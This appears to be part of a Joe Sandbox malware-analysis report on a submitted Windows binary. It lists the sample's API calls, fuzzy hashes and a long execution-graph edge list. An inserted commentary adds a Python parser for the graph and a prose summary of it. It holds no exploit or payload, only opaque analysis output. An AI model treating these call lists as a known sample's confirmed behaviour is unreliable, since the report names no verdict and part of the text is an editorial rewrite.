                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID: )q@
                                                          • API String ID: 3660427363-2284170586
                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                          APIs
                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastSleep
                                                          • String ID:
                                                          • API String ID: 1458359878-0
                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                          Execution Graph

                                                          Execution Coverage:16.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.4%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:74
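The execution_graph that follows is the rendered graph's serialized edge list: every node is written as `<id> <start address> [API names]`, collapsed callees carry a `<n> API calls` summary, and every edge is `<id>-><id>`. Reading it by eye is hopeless, so here is an added example (my code, not Joe Sandbox's) of a small Python parser that rebuilds the graph from that text and answers the question an analyst actually has, which Windows APIs are reachable from a given root node. The embedded sample is an excerpt of the report's own list rooted at 402584, truncated after its first few dozen tokens; the parser assumes decimal node ids and lowercase hex addresses, which is what the listing here uses.

```python
"""Parse Joe Sandbox's flattened execution_graph text and compute API reachability.
Added example; not part of the Joe Sandbox report or tooling."""
import re
from collections import defaultdict, deque

# Token shapes in the serialized graph:
#   <node id> <hex address> [label tokens ...]   declares a node (labels are API names)
#   <id>-><id>                                  declares a directed edge
#   "<n> API calls"                             summary label on a collapsed callee
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
HEX_ADDR_RE = re.compile(r"^[0-9a-f]{4,8}$")
SUMMARY_RE = re.compile(r"^\d+ API calls$")

# Constructed sample: an excerpt of the report's own edge list (root node 49750 at 402584).
SAMPLE_GRAPH = (
    "execution_graph 49750 402584 49751 402598 49750->49751 49752 4025ab 49750->49752 "
    "49780 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc "
    "RtlLeaveCriticalSection 49751->49780 49754 4025c2 RtlEnterCriticalSection "
    "49752->49754 49755 4025cc 49752->49755 49754->49755 49766 4023b4 13 API calls "
    "49755->49766 49756 40259d 49756->49752 49758 4025a1 49756->49758 49759 4025d5 "
    "49760 4025d9 49759->49760 49767 402088 49759->49767 49762 402635 49760->49762 "
    "49763 40262b RtlLeaveCriticalSection 49760->49763 49763->49762 49764 4025e5 "
    "49764->49760 49781 402210 9 API calls 49764->49781 49766->49759"
)


def parse_execution_graph(text):
    """Return (nodes, edges). nodes: id -> {"addr": hex str, "labels": [tokens]}."""
    tokens = text.split()
    nodes, edges = {}, []
    current = None  # node whose label tokens we are currently collecting
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            src, dst = edge.groups()
            for n in (src, dst):  # edges may name nodes declared later (or truncated away)
                nodes.setdefault(n, {"addr": None, "labels": []})
            edges.append((src, dst))
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if NODE_ID_RE.match(tok) and HEX_ADDR_RE.match(nxt):
            current = tok
            nodes.setdefault(current, {"addr": None, "labels": []})["addr"] = nxt
            i += 2
            continue
        if current is not None:  # anything else is a label of the open node
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def api_calls(node):
    """API names on a node; a '<n> API calls' summary names no API and yields []."""
    label = " ".join(node["labels"])
    if not label or SUMMARY_RE.match(label):
        return []
    return list(node["labels"])


def reachable(nodes, edges, root):
    """Set of node ids reachable from root by BFS (root included)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, queue = {root}, deque([root])
    while queue:
        for m in succ[queue.popleft()]:
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return seen


def reachable_apis(nodes, edges, root):
    """Every API name attached to any node reachable from root."""
    names = set()
    for n in reachable(nodes, edges, root):
        names.update(api_calls(nodes[n]))
    return names


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    print(len(nodes), "nodes,", len(edges), "edges")
    print("APIs reachable from 49750:", sorted(reachable_apis(nodes, edges, "49750")))
```

On the excerpt, the parser finds 16 nodes and 17 edges; from the root 49750 only the critical-section/LocalAlloc allocator at 4019cc is reachable, while the 402210 branch hanging off 49764 is not, which is exactly the kind of answer the rendered graph gives at a glance and the flat text hides. Feeding it the full list from the report lets you ask the same question for the Wow64DisableWow64FsRedirection/DeleteFileA branches under 490f80.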
                                                          execution_graph: [serialized edge list of the rendered execution graph (2000 nodes; each node is "<id> <start address> [API calls]", each edge "<id>-><id>"); this is figure data rather than readable text, and the list continues beyond this section. Recoverable from the node labels: the roots 402584 and 401f94 pass through the allocator routines at 4019cc (RtlInitializeCriticalSection, RtlEnterCriticalSection, LocalAlloc, RtlLeaveCriticalSection) backed by VirtualAlloc at 401678 and 4014f3 and VirtualFree at 4015c0; window-class and font setup at 416408 (GetClassInfoA, UnregisterClassA, RegisterClassA) and 41a29b (CreateFontIndirectA); and a file-operation dispatcher at 490f80 whose branches wrap DeleteFileA (4528dc), RemoveDirectoryA (452de4), MoveFileA (452c95) and CreateDirectoryA (45277c) in Wow64DisableWow64FsRedirection / SetLastError / Wow64RevertWow64FsRedirection / GetLastError, alongside GetFullPathNameA (42c81f), GetCurrentDirectoryA (407270), SetCurrentDirectoryA (40373c), FormatMessageA (42e8c0), MessageBeep (409088), IsDBCSLeadByte (42c43c), TlsSetValue/TlsGetValue, VariantClear and WriteFile (4413a3).]
50298->50299 50300 42c673 50299->50300 50300->50178 50300->50179 50301->50219 50302->50221 50303 480002 50304 48000b 50303->50304 50306 480036 50303->50306 50305 480028 50304->50305 50304->50306 50711 4766e4 189 API calls 50305->50711 50307 480075 50306->50307 50713 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50306->50713 50308 480099 50307->50308 50311 48008c 50307->50311 50312 48008e 50307->50312 50316 4800d5 50308->50316 50317 4800b7 50308->50317 50321 47eb30 42 API calls 50311->50321 50715 47ebc4 42 API calls 50312->50715 50313 48002d 50313->50306 50712 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50313->50712 50314 480068 50714 47eb54 42 API calls 50314->50714 50718 47e984 24 API calls 50316->50718 50322 4800cc 50317->50322 50716 47eb54 42 API calls 50317->50716 50321->50308 50717 47e984 24 API calls 50322->50717 50324 4800d3 50326 4800eb 50324->50326 50327 4800e5 50324->50327 50328 4800e9 50326->50328 50329 47eb30 42 API calls 50326->50329 50327->50328 50429 47eb30 50327->50429 50434 47bf1c 50328->50434 50329->50328 50787 47e618 42 API calls 50429->50787 50431 47eb4b 50788 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50431->50788 50789 42d890 GetWindowsDirectoryA 50434->50789 50436 47bf3a 50437 403450 4 API calls 50436->50437 50438 47bf47 50437->50438 50791 42d8bc GetSystemDirectoryA 50438->50791 50440 47bf4f 50441 403450 4 API calls 50440->50441 50442 47bf5c 50441->50442 50793 42d8e8 50442->50793 50444 47bf64 50445 403450 4 API calls 50444->50445 50446 47bf71 50445->50446 50447 47bf96 50446->50447 50448 47bf7a 50446->50448 50450 403400 4 API calls 50447->50450 50849 42d200 50448->50849 50452 47bf94 50450->50452 50454 47bfdb 50452->50454 50456 42c8c4 5 API calls 50452->50456 50453 403450 4 API calls 50453->50452 50797 47bda4 50454->50797 50458 47bfb6 50456->50458 50460 403450 4 API calls 50458->50460 50459 403450 4 API calls 50463 47bff7 50459->50463 50461 47bfc3 50460->50461 50461->50454 50464 403450 4 API 
calls 50461->50464 50462 47c015 50466 47bda4 8 API calls 50462->50466 50463->50462 50465 4035c0 4 API calls 50463->50465 50464->50454 50465->50462 50467 47c024 50466->50467 50468 403450 4 API calls 50467->50468 50469 47c031 50468->50469 50470 47c059 50469->50470 50471 42c3f4 5 API calls 50469->50471 50472 47c0c0 50470->50472 50476 47bda4 8 API calls 50470->50476 50473 47c047 50471->50473 50474 47c0ea 50472->50474 50475 47c0c9 50472->50475 50477 4035c0 4 API calls 50473->50477 50808 42c3f4 50474->50808 50478 42c3f4 5 API calls 50475->50478 50479 47c071 50476->50479 50477->50470 50481 47c0d6 50478->50481 50482 403450 4 API calls 50479->50482 50484 4035c0 4 API calls 50481->50484 50485 47c07e 50482->50485 50711->50313 50713->50314 50714->50307 50715->50308 50716->50322 50717->50324 50718->50324 50787->50431 50790 42d8b1 50789->50790 50790->50436 50792 42d8dd 50791->50792 50792->50440 50794 403400 4 API calls 50793->50794 50795 42d8f8 GetModuleHandleA GetProcAddress 50794->50795 50796 42d911 50795->50796 50796->50444 50859 42de14 50797->50859 50799 47bdca 50800 47bdf0 50799->50800 50801 47bdce 50799->50801 50803 403400 4 API calls 50800->50803 50862 42dd44 50801->50862 50804 47bdf7 50803->50804 50804->50459 50806 47bde5 RegCloseKey 50806->50804 50807 403400 4 API calls 50807->50806 50809 42c421 50808->50809 50810 42c3fe 50808->50810 50850 4038a4 4 API calls 50849->50850 50851 42d213 50850->50851 50852 42d22a GetEnvironmentVariableA 50851->50852 50856 42d23d 50851->50856 50897 42dbc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50851->50897 50852->50851 50853 42d236 50852->50853 50854 403400 4 API calls 50853->50854 50854->50856 50856->50453 50860 42de25 RegOpenKeyExA 50859->50860 50861 42de1f 50859->50861 50860->50799 50861->50860 50865 42dbf8 50862->50865 50866 42dc1e RegQueryValueExA 50865->50866 50872 42dc41 50866->50872 50881 42dc63 50866->50881 50867 403400 4 API calls 50869 42dd2f 50867->50869 50868 42dc5b 50870 403400 4 API calls 50868->50870 50869->50806 
50869->50807 50870->50881 50871 4034e0 4 API calls 50871->50872 50872->50868 50872->50871 50872->50881 50882 403744 50872->50882 50874 42dc98 RegQueryValueExA 50874->50866 50875 42dcb4 50874->50875 50875->50881 50886 4038a4 50875->50886 50878 42dd08 50879 403450 4 API calls 50878->50879 50879->50881 50880 403744 4 API calls 50880->50878 50881->50867 50883 40374a 50882->50883 50885 40375b 50882->50885 50884 4034bc 4 API calls 50883->50884 50883->50885 50884->50885 50885->50874 50887 4038b1 50886->50887 50888 4038e1 50886->50888 50889 4038da 50887->50889 50891 4038bd 50887->50891 50890 403400 4 API calls 50888->50890 50892 4034bc 4 API calls 50889->50892 50893 4038cb 50890->50893 50895 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50891->50895 50892->50888 50893->50878 50893->50880 50895->50893 50897->50851 52959 491d44 52960 491d78 52959->52960 52961 491d7a 52960->52961 52962 491d8e 52960->52962 53095 446f94 18 API calls 52961->53095 52965 491dca 52962->52965 52966 491d9d 52962->52966 52964 491d83 Sleep 53021 491dc5 52964->53021 52971 491dd9 52965->52971 52972 491e06 52965->52972 52967 446ff0 18 API calls 52966->52967 52970 491dac 52967->52970 52968 403420 4 API calls 52969 492238 52968->52969 52973 491db4 FindWindowA 52970->52973 52974 446ff0 18 API calls 52971->52974 52977 491e5c 52972->52977 52978 491e15 52972->52978 52976 447270 5 API calls 52973->52976 52975 491de6 52974->52975 52979 491dee FindWindowA 52975->52979 52976->53021 52983 491eb8 52977->52983 52984 491e6b 52977->52984 53096 446f94 18 API calls 52978->53096 52981 447270 5 API calls 52979->52981 53037 491e01 52981->53037 52982 491e21 53097 446f94 18 API calls 52982->53097 52990 491f14 52983->52990 52991 491ec7 52983->52991 53100 446f94 18 API calls 52984->53100 52987 491e2e 53098 446f94 18 API calls 52987->53098 52988 491e77 53101 446f94 18 API calls 52988->53101 53001 491f4e 52990->53001 53002 491f23 52990->53002 53105 446f94 18 API calls 52991->53105 52993 491e3b 53099 446f94 18 API calls 
52993->53099 52995 491e84 53102 446f94 18 API calls 52995->53102 52997 491e46 SendMessageA 53000 447270 5 API calls 52997->53000 52998 491ed3 53106 446f94 18 API calls 52998->53106 53000->53037 53012 491f5d 53001->53012 53018 491f9c 53001->53018 53005 446ff0 18 API calls 53002->53005 53004 491e91 53103 446f94 18 API calls 53004->53103 53008 491f30 53005->53008 53006 491ee0 53107 446f94 18 API calls 53006->53107 53014 491f38 RegisterClipboardFormatA 53008->53014 53010 491e9c PostMessageA 53104 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53010->53104 53011 491eed 53108 446f94 18 API calls 53011->53108 53110 446f94 18 API calls 53012->53110 53017 447270 5 API calls 53014->53017 53017->53021 53022 491fab 53018->53022 53023 491ff0 53018->53023 53019 491ef8 SendNotifyMessageA 53109 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53019->53109 53020 491f69 53111 446f94 18 API calls 53020->53111 53021->52968 53113 446f94 18 API calls 53022->53113 53031 491fff 53023->53031 53032 492044 53023->53032 53026 491f76 53112 446f94 18 API calls 53026->53112 53029 491fb7 53114 446f94 18 API calls 53029->53114 53030 491f81 SendMessageA 53034 447270 5 API calls 53030->53034 53117 446f94 18 API calls 53031->53117 53040 492053 53032->53040 53041 4920a6 53032->53041 53034->53037 53036 491fc4 53115 446f94 18 API calls 53036->53115 53037->53021 53038 49200b 53118 446f94 18 API calls 53038->53118 53044 446ff0 18 API calls 53040->53044 53049 49212d 53041->53049 53050 4920b5 53041->53050 53043 491fcf PostMessageA 53116 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53116 53047 492060 53044->53047 53045 492018 53119 446f94 18 API calls 53045->53119 53051 42e38c 2 API calls 53047->53051 53060 49213c 53049->53060 53061 492162 53049->53061 53053 446ff0 18 API calls 53050->53053 53054 49206d 53051->53054 53052 492023 SendNotifyMessageA 53120 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53052->53120 53056 
4920c4 53053->53056 53057 492083 GetLastError 53054->53057 53058 492073 53054->53058 53121 446f94 18 API calls 53056->53121 53062 447270 5 API calls 53057->53062 53059 447270 5 API calls 53058->53059 53063 492081 53059->53063 53126 446f94 18 API calls 53060->53126 53068 492171 53061->53068 53069 492194 53061->53069 53062->53063 53067 447270 5 API calls 53063->53067 53066 492146 FreeLibrary 53127 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53066->53127 53067->53021 53072 446ff0 18 API calls 53068->53072 53078 4921a3 53069->53078 53084 4921d7 53069->53084 53070 4920d7 GetProcAddress 53073 49211d 53070->53073 53074 4920e3 53070->53074 53075 49217d 53072->53075 53125 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53073->53125 53122 446f94 18 API calls 53074->53122 53080 492185 CreateMutexA 53075->53080 53128 48c174 18 API calls 53078->53128 53079 4920ef 53123 446f94 18 API calls 53079->53123 53080->53021 53083 4920fc 53087 447270 5 API calls 53083->53087 53084->53021 53130 48c174 18 API calls 53084->53130 53086 4921af 53088 4921c0 OemToCharBuffA 53086->53088 53089 49210d 53087->53089 53129 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53088->53129 53124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53089->53124 53092 4921f2 53093 492203 CharToOemBuffA 53092->53093 53131 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53093->53131 53095->52964 53096->52982 53097->52987 53098->52993 53099->52997 53100->52988 53101->52995 53102->53004 53103->53010 53104->53037 53105->52998 53106->53006 53107->53011 53108->53019 53109->53021 53110->53020 53111->53026 53112->53030 53113->53029 53114->53036 53115->53043 53116->53037 53117->53038 53118->53045 53119->53052 53120->53021 53121->53070 53122->53079 53123->53083 53124->53037 53125->53037 53126->53066 53127->53021 53128->53086 53129->53021 53130->53092 53131->53021 53132 41ee4c 53133 41ee91 53132->53133 53134 41ee5b 
IsWindowVisible 53132->53134 53134->53133 53135 41ee65 IsWindowEnabled 53134->53135 53135->53133 53136 41ee6f 53135->53136 53137 402648 4 API calls 53136->53137 53138 41ee79 EnableWindow 53137->53138 53138->53133 53139 41fb50 53140 41fb59 53139->53140 53143 41fdf4 53140->53143 53142 41fb66 53144 41fee6 53143->53144 53145 41fe0b 53143->53145 53144->53142 53145->53144 53164 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53145->53164 53147 41fe41 53148 41fe45 53147->53148 53149 41fe6b 53147->53149 53165 41fb94 53148->53165 53174 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53149->53174 53152 41fe79 53154 41fea3 53152->53154 53155 41fe7d 53152->53155 53158 41fb94 10 API calls 53154->53158 53157 41fb94 10 API calls 53155->53157 53156 41fb94 10 API calls 53163 41fe69 53156->53163 53159 41fe8f 53157->53159 53160 41feb5 53158->53160 53161 41fb94 10 API calls 53159->53161 53162 41fb94 10 API calls 53160->53162 53161->53163 53162->53163 53163->53142 53164->53147 53166 41fbaf 53165->53166 53167 41f934 4 API calls 53166->53167 53168 41fbc5 53166->53168 53167->53168 53175 41f934 53168->53175 53170 41fc0d 53171 41fc30 SetScrollInfo 53170->53171 53183 41fa94 53171->53183 53174->53152 53194 4181d8 53175->53194 53177 41f951 GetWindowLongA 53178 41f98e 53177->53178 53179 41f96e 53177->53179 53197 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53178->53197 53196 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53179->53196 53182 41f97a 53182->53170 53184 41faa2 53183->53184 53185 41faaa 53183->53185 53184->53156 53186 41fae9 53185->53186 53187 41fad9 53185->53187 53193 41fae7 53185->53193 53199 417e40 IsWindowVisible ScrollWindow SetWindowPos 53186->53199 53198 417e40 IsWindowVisible ScrollWindow SetWindowPos 53187->53198 53188 41fb29 GetScrollPos 53188->53184 53191 41fb34 53188->53191 53192 41fb43 SetScrollPos 53191->53192 53192->53184 53193->53188 53195 4181e2 53194->53195 53195->53177 53196->53182 53197->53182 
53198->53193 53199->53193 53200 420590 53201 4205a3 53200->53201 53221 415b28 53201->53221 53203 4206ea 53204 420701 53203->53204 53228 4146cc KiUserCallbackDispatcher 53203->53228 53205 420718 53204->53205 53229 414710 KiUserCallbackDispatcher 53204->53229 53211 42073a 53205->53211 53230 420058 12 API calls 53205->53230 53206 4205de 53206->53203 53207 420649 53206->53207 53214 42063a MulDiv 53206->53214 53226 420840 20 API calls 53207->53226 53212 420662 53212->53203 53227 420058 12 API calls 53212->53227 53225 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53214->53225 53217 42067f 53218 42069b MulDiv 53217->53218 53219 4206be 53217->53219 53218->53219 53219->53203 53220 4206c7 MulDiv 53219->53220 53220->53203 53222 415b3a 53221->53222 53231 414468 53222->53231 53224 415b52 53224->53206 53225->53207 53226->53212 53227->53217 53228->53204 53229->53205 53230->53211 53232 414482 53231->53232 53235 410640 53232->53235 53234 414498 53234->53224 53238 40de8c 53235->53238 53237 410646 53237->53234 53239 40deee 53238->53239 53240 40de9f 53238->53240 53245 40defc 53239->53245 53243 40defc 19 API calls 53240->53243 53244 40dec9 53243->53244 53244->53237 53246 40df0c 53245->53246 53248 40df22 53246->53248 53257 40e284 53246->53257 53273 40d7c8 53246->53273 53276 40e134 53248->53276 53251 40d7c8 5 API calls 53252 40df2a 53251->53252 53252->53251 53253 40df96 53252->53253 53279 40dd48 53252->53279 53254 40e134 5 API calls 53253->53254 53256 40def8 53254->53256 53256->53237 53293 40eb54 53257->53293 53259 403778 4 API calls 53260 40e2bf 53259->53260 53260->53259 53261 40e375 53260->53261 53355 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53260->53355 53356 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53260->53356 53262 40e390 53261->53262 53263 40e39f 53261->53263 53302 40e5a8 53262->53302 53352 40bc0c 53263->53352 53269 40e39d 53270 403400 4 API calls 53269->53270 53271 40e444 53270->53271 53271->53246 53274 40ebf0 
5 API calls 53273->53274 53275 40d7d2 53274->53275 53275->53246 53389 40d6a4 53276->53389 53398 40e13c 53279->53398 53282 40eb54 5 API calls 53283 40dd86 53282->53283 53284 40eb54 5 API calls 53283->53284 53285 40dd91 53284->53285 53286 40dda3 53285->53286 53287 40ddac 53285->53287 53292 40dda9 53285->53292 53408 40dcb0 19 API calls 53286->53408 53405 40dbc0 53287->53405 53290 403420 4 API calls 53291 40de77 53290->53291 53291->53252 53292->53290 53358 40d968 53293->53358 53296 4034e0 4 API calls 53297 40eb77 53296->53297 53298 403744 4 API calls 53297->53298 53299 40eb7e 53298->53299 53300 40d968 5 API calls 53299->53300 53301 40eb8c 53300->53301 53301->53260 53303 40e5d4 53302->53303 53304 40e5de 53302->53304 53363 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53303->53363 53306 40e620 53304->53306 53307 40e6c1 53304->53307 53308 40e651 53304->53308 53309 40e6a3 53304->53309 53310 40e6f9 53304->53310 53311 40e67d 53304->53311 53312 40e6de 53304->53312 53313 40e75e 53304->53313 53345 40e644 53304->53345 53364 40d94c 53306->53364 53374 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53307->53374 53308->53345 53370 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53308->53370 53373 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53309->53373 53314 40d94c 5 API calls 53310->53314 53371 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53311->53371 53376 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53312->53376 53320 40d94c 5 API calls 53313->53320 53323 40e701 53314->53323 53316 403400 4 API calls 53324 40e7d3 53316->53324 53327 40e766 53320->53327 53331 40e70b 53323->53331 53339 40e705 53323->53339 53324->53269 53325 40e6cc 53375 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53325->53375 53326 40e688 53372 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53326->53372 53334 40e783 53327->53334 53335 40e76a 53327->53335 53329 40e649 
53369 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53329->53369 53330 40e62c 53367 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53330->53367 53377 40ebf0 53331->53377 53383 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53334->53383 53342 40ebf0 5 API calls 53335->53342 53340 40e709 53339->53340 53344 40ebf0 5 API calls 53339->53344 53340->53345 53381 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53340->53381 53342->53345 53343 40e637 53368 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53343->53368 53348 40e72c 53344->53348 53345->53316 53380 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53348->53380 53349 40e74e 53382 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53349->53382 53384 40bbb8 53352->53384 53355->53260 53356->53260 53357 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53357->53269 53361 40d973 53358->53361 53359 40d9ad 53359->53296 53361->53359 53362 40d9b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53361->53362 53362->53361 53363->53304 53365 40ebf0 5 API calls 53364->53365 53366 40d956 53365->53366 53366->53329 53366->53330 53367->53343 53368->53345 53369->53308 53370->53345 53371->53326 53372->53345 53373->53345 53374->53325 53375->53345 53376->53345 53378 40d968 5 API calls 53377->53378 53379 40ebfd 53378->53379 53379->53345 53380->53340 53381->53349 53382->53345 53383->53345 53385 40bbca 53384->53385 53387 40bbef 53384->53387 53385->53387 53388 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53385->53388 53387->53269 53387->53357 53388->53387 53390 40ebf0 5 API calls 53389->53390 53391 40d6b1 53390->53391 53392 40d6c4 53391->53392 53396 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53391->53396 53392->53252 53394 40d6bf 53397 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53394->53397 53396->53394 53397->53392 53399 40d94c 5 API calls 
53398->53399 53400 40e153 53399->53400 53401 40ebf0 5 API calls 53400->53401 53404 40dd7b 53400->53404 53402 40e160 53401->53402 53402->53404 53409 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53402->53409 53404->53282 53410 40ad64 19 API calls 53405->53410 53407 40dbe8 53407->53292 53408->53292 53409->53404 53410->53407 53411 42f518 53412 42f523 53411->53412 53413 42f527 NtdllDefWindowProc_A 53411->53413 53413->53412 53414 4358d8 53415 4358ed 53414->53415 53419 435907 53415->53419 53420 4352c0 53415->53420 53424 4352f0 53420->53424 53430 43530a 53420->53430 53421 403400 4 API calls 53422 43570f 53421->53422 53422->53419 53433 435720 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53422->53433 53423 446d9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53423->53424 53424->53423 53425 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53425 53426 402648 4 API calls 53424->53426 53427 431c98 4 API calls 53424->53427 53428 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53428 53424->53430 53431 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53431 53434 4343a8 53424->53434 53446 434b6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53446 53425->53424 53426->53424 53427->53424 53428->53424 53430->53421 53431->53424 53433->53419 53435 434465 53434->53435 53436 4343d5 53434->53436 53465 434308 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53435->53465 53438 403494 4 API calls 53436->53438 53439 4343e3 53438->53439 53440 403778 4 API calls 53439->53440 53444 434404 53440->53444 53441 403400 4 API calls 53442 4344b5 53441->53442 53442->53424 53443 434457 53443->53441 53444->53443 53447 493e50 53444->53447 53446->53424 53448 493e88 53447->53448 53449 493f20 53447->53449 53450 403494 4 API calls 53448->53450 53466 448928 53449->53466 53454 493e93 53450->53454 53452 403400 4 API calls 53453 493f44 53452->53453 53455 403400 4 API calls 53453->53455 53456 4037b8 4 API calls 53454->53456 53458 493ea3 53454->53458 
